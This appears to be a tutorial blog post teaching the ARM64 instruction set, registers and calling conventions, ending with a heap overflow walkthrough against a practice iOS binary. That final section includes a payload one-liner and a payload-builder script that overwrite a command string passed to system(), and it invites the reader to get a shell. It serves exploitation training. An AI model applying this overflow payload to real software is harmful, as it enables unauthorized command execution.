ARM64 Reversing and Exploitation Part 1 - ARM Instruction Set + Simple Heap Overflow
Hi everyone! In this blog series, we will learn the ARM instruction set, use it to reverse ARM binaries, and then write exploits for them. So let’s start with the basics of ARM64.
ARM64 is a RISC (reduced instruction set computer) architecture. The distinguishing factor of a RISC architecture is the use of a small, highly optimized set of instructions, rather than the more specialized set often found in other types of architecture (for example, CISC). ARM64 follows the load/store approach: data-processing instructions take their operands from registers and write their result to a register. A load-store architecture divides instructions into two categories: memory access (load and store between memory and registers) and ALU operations (which only occur between registers). This differs from a register-memory architecture (for example, a CISC instruction set architecture such as x86), in which one of the operands of an ADD operation may be in memory while the other is in a register. The ARM architecture is well suited to mobile devices, since a RISC design requires fewer transistors, which leads to lower power consumption and less heat, and therefore to better battery life.
Both current iOS and Android phones use ARM processors, and the newer ones use ARM64 specifically. Reversing ARM64 assembly code is therefore vital to understanding the internal workings of a binary or app. It is impossible to cover the whole ARM64 instruction set in this blog series, so we will focus on the most useful instructions and the most commonly used registers. Note also that ARM64 is also referred to as ARMv8 (8.1, 8.3 etc.), while ARM32 is ARMv7(s).
ARMv8 (ARM64) maintains compatibility with the existing 32-bit architecture by using two execution states - AArch32 and AArch64. In the AArch32 state, the processor can only access 32-bit registers. In the AArch64 state, the processor can access both 32-bit and 64-bit registers.
ARM64 has several general-purpose and special-purpose registers. The general-purpose registers are those which do not have side effects, and hence can be used by most instructions. One can do arithmetic with them, use them for memory addresses, and so on. The special-purpose registers also do not have side effects, but can only be used for certain purposes and only by certain instructions. Other instructions may depend on their values implicitly. One example of this is the Stack Pointer register. And then we have control registers - these registers have side effects. On ARM64 these are registers like TTBR (Translation Table Base Register), which holds the base pointer of the current page tables. Many of these are privileged and can only be used by kernel code. Some control registers, however, can be used by anyone. In the image below we can see some control registers from the XNU kernel.
Example of some control registers used in the iOS kernel
A modern OS expects to have several privilege levels which it can use to control access to resources. An example of this is the split between the kernel and userland. Armv8 enables this split by implementing different levels of privilege, which are referred to as Exception levels in the Armv8-A architecture. ARMv8 has several exception levels that are numbered (EL0, EL1 etc.); the higher the number, the higher the privilege. When taking an exception, the exception level can either increase or remain the same. When returning from an exception, the exception level can either decrease or remain the same. The execution state (AArch32 or AArch64) can change only by taking or returning from an exception. On power-up, the device enters the highest exception level.
In terms of privilege EL0 < EL1 < EL2 < EL3
Example of Exception levels in ARM
The following list defines the different ARM64 registers and their purpose
- x0-x30 are 64-bit general purpose registers. Their bottom halves can be accessed via w0-w30.
- There are four stack pointer registers SP\_EL0, SP\_EL1, SP\_EL2, SP\_EL3 (one for each exception level), which are 64 bits wide. Apart from that there are three exception link registers ELR\_EL1, ELR\_EL2, ELR\_EL3, three saved program status registers SPSR\_EL1, SPSR\_EL2, SPSR\_EL3, and one Program Counter register (PC).
- ARM also uses PC-relative addressing, in which the operand address is specified relative to the PC (base address). This makes it possible to generate position-independent code.
- In ARM64 (unlike ARM32), the PC cannot be accessed by most instructions, especially not directly. The PC is modified indirectly by branch instructions such as b, bl, br, blr and ret.
- Similarly, the SP (Stack Pointer) register is never modified implicitly, since ARM64 has no push/pop instructions. The stack pointer is adjusted explicitly, for example by a pre-indexed or post-indexed stp/ldp.
- The Current Program Status Register (CPSR) holds the same program status flags as the APSR along with some additional information. In the AArch64 state these flags are part of PSTATE, and the condition flags are accessed through NZCV.
- First register in opcode is usually destination, rest are source (except for str, stp)
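To make the relationship between the x and w names concrete, here is a minimal Python sketch of a single register with both views. The `Register` class and its method names are hypothetical, made up for illustration. It models the architectural rule that a write through the w name keeps the low 32 bits and zeroes the upper 32 bits of the matching x register.

```python
MASK64 = (1 << 64) - 1
MASK32 = (1 << 32) - 1


class Register:
    """Toy model of one general-purpose register with x (64-bit) and w (32-bit) views."""

    def __init__(self):
        self.value = 0

    def write_x(self, value):
        # A 64-bit write replaces the whole register.
        self.value = value & MASK64

    def write_w(self, value):
        # A 32-bit write keeps the low 32 bits and zeroes the upper 32 bits.
        self.value = value & MASK32

    def read_x(self):
        return self.value

    def read_w(self):
        # The w view is the bottom half of the x register.
        return self.value & MASK32


x0 = Register()
x0.write_x(0x1122334455667788)
low_half = x0.read_w()        # bottom half only: 0x55667788
x0.write_w(0xDEADBEEF)
after_w_write = x0.read_x()   # upper half is now zero: 0x00000000DEADBEEF
```

This is why a `mov w0, ...` in a disassembly also clears the top half of x0, which is worth remembering when tracking values across instructions.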
|x0 -x7||Arguments (up to 8) - Rest on stack|
|x8 -x18||General purpose, hold variables. No assumptions can be made upon returning from a function|
|x19 -x28||If used by a function, must have their values preserved and later restored upon returning to the caller|
|x29 (fp)||Frame Pointer (points to bottom of frame)|
|x30 (lr)||Link Register. Holds the return address of a call|
|x16||Holds the system call # in (SVC 0x80) call|
|x31 (sp/(x/w)zr)||Stack Pointer (sp) or zero register(xzr or wzr)|
|PC||Program Counter Register. Contains the address of the next instruction to be executed|
|APSR / CPSR||Current Program status register (holds flags)|
ARM64 calling convention
- Arguments are passed in x0-x7 registers, rest are passed on the stack
- The ret instruction returns to the address held in a register, which by default is the link register (x30)
- The return value of the function is stored in x0, or in x0 and x1, depending on whether it is 64-bit or 128-bit
- x8 is the indirect result register, used to pass the address location of an indirect result, for example, where a function returns a large structure
- The B instruction branches to a label without saving a return address
- Branch with link (BL) copies the address of the next instruction (after the BL) into the link register (x30) before branching
- BL is hence used for subroutine calls
- BR is used to branch to the address held in a register, e.g. br x8
- BLR is used to branch to the address held in a register and store the address of the next instruction (after the BLR) into the link register (x30)
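The link register behaviour described above can be sketched with a tiny Python model. The helper names `bl` and `ret`, the `state` dictionary and all addresses are made up for illustration. It shows why a function that itself calls another function has to save x30 first: the nested BL overwrites it.

```python
INSTRUCTION_SIZE = 4  # every A64 instruction is 4 bytes long


def bl(state, bl_address, target):
    """BL: put the address of the next instruction in x30, then branch."""
    state["x30"] = bl_address + INSTRUCTION_SIZE
    state["pc"] = target


def ret(state):
    """RET: branch to the address held in x30."""
    state["pc"] = state["x30"]


state = {"pc": 0x1000, "x30": 0}

bl(state, 0x1000, 0x2000)    # main: "bl f" located at 0x1000
saved_lr = state["x30"]      # f's prologue saves x30 (0x1004)

bl(state, 0x2008, 0x3000)    # f: "bl g" at 0x2008 overwrites x30
lr_inside_g = state["x30"]   # 0x200c
ret(state)                   # g returns into f
pc_after_g = state["pc"]

state["x30"] = saved_lr      # f's epilogue restores x30
ret(state)                   # f returns into main
pc_after_f = state["pc"]     # 0x1004
```

Without the save and restore of x30 in f, the final ret would jump back to 0x200c instead of returning to main.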
|MOV||Move one register to another|
|MOVN||Move the bitwise NOT of a shifted 16-bit immediate into the register|
|MOVK||Move a shifted 16-bit immediate into the register and leave the rest unchanged|
|MOVZ||Move a shifted 16-bit immediate into the register and set the rest to zero|
|lsl/lsr||Logical shift left, Logical shift right|
|ldp/stp||Load/store a pair of registers from/to two consecutive memory locations|
|adr||Address of label at PC-relative offset|
|adrp||Address of page at PC-relative offset|
|cmp||Compare two values by subtracting them and discarding the result; the flags are updated automatically (N if the sign bit of the result is set, Z if the result is zero, V on signed overflow, C if there was NO borrow)|
|bne||Branch if zero flag is not set|
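To see how cmp and bne work together, here is a small Python sketch that computes the four condition flags for a 64-bit compare. The function names `cmp_flags` and `bne_taken` are hypothetical. The model treats `cmp a, b` as a subtraction whose result is thrown away, which is how the instruction is defined for 64-bit operands.

```python
MASK64 = (1 << 64) - 1


def to_signed(value):
    """Interpret a 64-bit pattern as a two's complement signed integer."""
    return value - (1 << 64) if value & (1 << 63) else value


def cmp_flags(a, b):
    """Return the NZCV flags that 'cmp a, b' would set for 64-bit operands."""
    a &= MASK64
    b &= MASK64
    result = (a - b) & MASK64
    signed_result = to_signed(a) - to_signed(b)
    return {
        "N": result >> 63,                 # sign bit of the result
        "Z": int(result == 0),             # operands were equal
        "C": int(a >= b),                  # set when there is NO unsigned borrow
        "V": int(not (-(1 << 63) <= signed_result < (1 << 63))),  # signed overflow
    }


def bne_taken(flags):
    """bne branches when the zero flag is clear."""
    return flags["Z"] == 0


equal = cmp_flags(5, 5)
smaller = cmp_flags(3, 5)
overflow = cmp_flags(1 << 63, 1)
```

For example, `cmp_flags(5, 5)` sets Z, so a following bne falls through, while `cmp_flags(3, 5)` clears Z and the branch is taken.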
Apart from this, there might be some system-specific registers as well, which are available only on that particular OS. For example, the registers below are present in iOS
Reading/Writing System Registers
For example, use MSR PAN, #1 to set the PAN bit and MSR PAN, #0 to clear the PAN bit
Prologue - Appears at the start of the function, prepares the stack and registers for use within the function
Epilogue - Appears at the end of the function, restores the stack and registers to the original state before function call
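A typical prologue/epilogue pair is `stp x29, x30, [sp, -64]!` followed later by `ldp x29, x30, [sp], 64`. The Python sketch below models just these two instructions on a dictionary-based stack. The helper names, the register values and the stack address are all made up for illustration.

```python
def stp_pre(regs, mem, r1, r2, offset):
    """stp r1, r2, [sp, offset]! : adjust sp first, then store the pair."""
    regs["sp"] += offset
    mem[regs["sp"]] = regs[r1]
    mem[regs["sp"] + 8] = regs[r2]


def ldp_post(regs, mem, r1, r2, offset):
    """ldp r1, r2, [sp], offset : load the pair first, then adjust sp."""
    regs[r1] = mem[regs["sp"]]
    regs[r2] = mem[regs["sp"] + 8]
    regs["sp"] += offset


# Hypothetical register state on entry to the function.
regs = {"sp": 0x16FDFF000, "x29": 0x16FDFF040, "x30": 0x100004000}
mem = {}
on_entry = dict(regs)

stp_pre(regs, mem, "x29", "x30", -64)   # prologue: save fp and lr, reserve 64 bytes
sp_in_body = regs["sp"]
regs["x29"] = regs["sp"]                # mov x29, sp (new frame pointer)
regs["x30"] = 0xDEAD                    # lr gets clobbered by a nested bl

ldp_post(regs, mem, "x29", "x30", 64)   # epilogue: restore fp and lr, free the frame
restored = regs == on_entry
```

After the epilogue, sp, x29 and x30 hold the same values as on entry, so the following ret goes back to the caller.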
- mov x0, x1 -> x0 = x1
- movn x0, 1 -> x0 = ~1 = -2 (use movn x0, 0 to get -1)
- add x0, x0, x1 -> x0 = x0 + x1
- ldr x0, [x1] -> x0 = *x1 -> x0 = value stored at the address in x1
- ldr x0, [x1, 0x10]! -> x1 += 0x10; x0 = *x1 (Pre-Indexing mode)
- ldr x0, [x1], 0x10 -> x0 = *x1; x1 += 0x10 (Post-Indexing mode)
- str x0, [x1] -> *x1 = x0 -> Destination is on the right
- ldr x0, [x1, 0x10] -> x0 = *(x1 + 0x10)
- ldrb w0, [x1] -> Load a byte from address stored in x1
- ldrsb w0, [x1] -> Load a signed byte from address stored in x1
- adr x0, label -> Load the address of label into x0
- stp x0, x1, [x2] -> *x2 = x0; *(x2 + 8) = x1
- stp x29, x30, [sp, -64]! -> sp -= 64; store x29, x30 (LR) on the stack
- ldp x29, x30, [sp], 64 -> Restore x29, x30 (LR) from the stack; sp += 64
- svc 0 -> Perform a syscall (the syscall number is taken from the x16 register)
- str x0, [x29] -> store x0 at the address in x29 (destination on right)
- ldr x0, [x29] -> load the value from the address in x29 into x0
- blr x0 -> calls the subroutine at the address stored in x0, store next instruction in link register (x30)
- br x0 -> Jump to address stored in x0
- bl label -> Branch to label, store next instruction in link register (x30)
- bl printf -> Call the printf function with its arguments in x0, x1, and so on
- ret -> Jump to the address stored in x30
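The mov family is easy to misread, so here is a short Python sketch of what movz, movk and movn compute. The function names mirror the mnemonics, but the Python signatures are hypothetical; the shift stands for the `lsl #16/#32/#48` operand. Note that movn writes the bitwise NOT of the immediate, so an immediate of 0 gives -1 and an immediate of 1 gives -2.

```python
MASK64 = (1 << 64) - 1


def movz(imm16, shift=0):
    """movz: place the 16-bit immediate at 'shift' and zero every other bit."""
    return (imm16 << shift) & MASK64


def movk(reg, imm16, shift=0):
    """movk: replace only the 16 bits at 'shift', keep the rest of the register."""
    cleared = reg & ~(0xFFFF << shift)
    return (cleared | (imm16 << shift)) & MASK64


def movn(imm16, shift=0):
    """movn: write the bitwise NOT of the shifted immediate."""
    return ~(imm16 << shift) & MASK64


def to_signed(value):
    """Interpret a 64-bit pattern as a two's complement signed integer."""
    return value - (1 << 64) if value & (1 << 63) else value


# Building a 64-bit constant 16 bits at a time, as compilers commonly do.
x0 = movz(0x7788)
x0 = movk(x0, 0x5566, 16)
x0 = movk(x0, 0x3344, 32)
x0 = movk(x0, 0x1122, 48)     # x0 is now 0x1122334455667788

minus_one = to_signed(movn(0))
minus_two = to_signed(movn(1))
```

When reversing, a movz followed by one to three movk instructions on the same register is usually a single constant or address being loaded.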
A Simple Heap Overflow
Let’s write a simple Heap overflow exploit for an ARM binary.
Your task is to exploit a heap overflow vulnerability in the vuln binary to execute a command of your choice. The binaries are compiled for the iOS platform, so they need to be run on a jailbroken iOS device.
The binaries for this and the next article can be found here
SSH to your Corellium (or jailbroken iOS) device and run the vuln binary. You get a message that says “Better luck next time”
Let’s open the binary in Hopper to see what’s going on. Let’s have a look at the main function.
From the disassembly, it is clear what we need to do to reach the function heapOverflow
In order to do that, the following requirements must be met:
- Pass three arguments (or two, since the first argument in a C program is the command with which the program is invoked)
- argv[1] should be the string “heap”
- argv[2] should be some argument that gets passed as the first argument to the function heapOverflow
Just to recall
A main function in C has the prototype
int main(int argc, char **argv)
argc - An integer that contains the count of arguments that follow in argv. The argc parameter is always greater than or equal to 1.
argv - An array of null-terminated strings representing command-line arguments entered by the user of the program. By convention, argv[0] is the command with which the program is invoked, argv[1] is the first command-line argument, and so on, until argv[argc], which is always NULL
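The argument checks in main can be summarized with a rough Python sketch. This is only a model of the behaviour described in this article, not the binary's actual code: the function name `dispatch` is hypothetical, and whether main tests argc for exactly 3 is an assumption.

```python
def dispatch(argv):
    """Model of main's argument checks; argv[0] is the program name, as in C."""
    argc = len(argv)
    # Assumption: exactly three arguments are expected (program, "heap", file name).
    if argc == 3 and argv[1] == "heap":
        return ("heapOverflow", argv[2])
    return ("Better luck next time", None)


no_args = dispatch(["./vuln"])
heap_call = dispatch(["./vuln", "heap", "input.txt"])
```

Running the binary with no arguments corresponds to the first case, which matches the “Better luck next time” message seen earlier.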
Let’s also have a look at the PseudoCode of the heapOverflow function. Note that the PseudoCode shows up for 32-bit arch but still gives you a good idea of the program flow.
So it seems like it tries to open a file with the name as the first argument which is passed to it.
At the end, there is also a call to the system function, which executes a command; its argument is held in the r22 (or x22) register
The buffer pointed to by r21 (x21) is allocated with 0x400 bytes, and is filled using the following fread call
fread(r21, 0x1, r20, r19);
Let’s create a simple file on the device and pass it as input to the vuln binary.
echo "Hello World" > input.txt
./vuln heap input.txt
So it seems like it prints the output of the whoami command
Let’s cheat a bit to look at the Source code itself
Sure enough, passing a file longer than 0x400 bytes will overflow into the adjacent memory and might end up overwriting the string “command”, and thus when the call to system is made, we might be able to run our own commands.
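The overflow can be modelled in a few lines of Python. This is a simplified sketch, not the real allocator: it assumes the command string sits immediately after the 0x400-byte buffer with no metadata in between. All names (`make_heap`, `unchecked_read`, `c_string_at`) are made up for illustration.

```python
BUF_SIZE = 0x400


def make_heap():
    """Return a flat 'heap' with a 0x400-byte buffer followed by the command string."""
    heap = bytearray(BUF_SIZE + 0x20)
    command_offset = BUF_SIZE          # assumption: the command chunk is adjacent
    heap[command_offset:command_offset + 7] = b"whoami\x00"
    return heap, command_offset


def unchecked_read(heap, file_bytes):
    """Copy the whole file into the buffer, like an fread sized by the file length."""
    n = min(len(file_bytes), len(heap))   # stay inside the model's memory
    heap[:n] = file_bytes[:n]


def c_string_at(heap, offset):
    """Read a NUL-terminated string, the way system() would see it."""
    end = heap.index(0, offset)
    return bytes(heap[offset:end]).decode()


heap, command_offset = make_heap()
unchecked_read(heap, b"Hello World\n")
benign_command = c_string_at(heap, command_offset)      # still "whoami"

heap, command_offset = make_heap()
unchecked_read(heap, b"/" * BUF_SIZE + b"/bin/ls\x00")
hijacked_command = c_string_at(heap, command_offset)    # now "/bin/ls"
```

On a real heap the distance between the two allocations may be larger than 0x400, which is one reason to pad with "/" characters: extra leading slashes still form a valid path.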
On the Corellium device, use the following command to generate the malicious file
python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
Then pass it as input to the binary.
./vuln heap hax.txt
Instead of the whoami command, the ls command gets executed.
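If you want to try other commands, the one-liner can be turned into a small script. The sketch below is one possible way to do it, with hypothetical function names `build_payload` and `write_payload`. It writes raw bytes instead of using print, so no trailing newline is added, and it assumes the same layout as before: 0x400 bytes of padding followed by the command.

```python
def build_payload(command: bytes, buf_size: int = 0x400) -> bytes:
    """Pad with '/' up to the buffer size, then append the NUL-terminated command."""
    if not command.startswith(b"/"):
        # The '/' padding only forms a valid path if the command is an absolute path.
        raise ValueError("command must be an absolute path")
    return b"/" * buf_size + command + b"\x00"


def write_payload(path: str, command: bytes) -> None:
    """Write the payload file that is later passed to the vuln binary."""
    with open(path, "wb") as handle:
        handle.write(build_payload(command))


payload = build_payload(b"/bin/ls")
```

Calling `write_payload("hax.txt", b"/bin/ls")` produces a file with the same padding and command as the one-liner above.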
Can you try to get a shell on the device using this?
- https://developer.arm.com/documentation/ddi0487/latest/arm-architecture-reference-manual-armv8-for-armv8-a-architecture-profile
- https://exploit.education